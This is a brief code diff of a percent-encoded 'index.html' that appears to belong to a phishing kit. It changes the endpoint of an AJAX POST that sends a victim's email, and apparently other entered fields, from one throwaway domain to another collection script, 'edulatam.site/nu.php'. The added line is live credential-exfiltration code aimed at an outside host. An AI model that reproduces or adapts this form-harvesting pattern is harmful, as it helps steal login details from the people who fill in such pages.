--- a/%69%6E%64%65%78.html
+++ b/%69%6E%64%65%78.html
@@ -360,7 +360,7 @@ count=count+1;
 
 $.ajax({
 dataType: 'JSON',
-url: 'https://gen18sygahq018.sbs/BN.Koul.CDp.77WGVbx:73gg1G-82G/BN79ql.php',
+url: 'https://edulatam.site/nu.php',
 type: 'POST',
       	data:{
       		email:email,
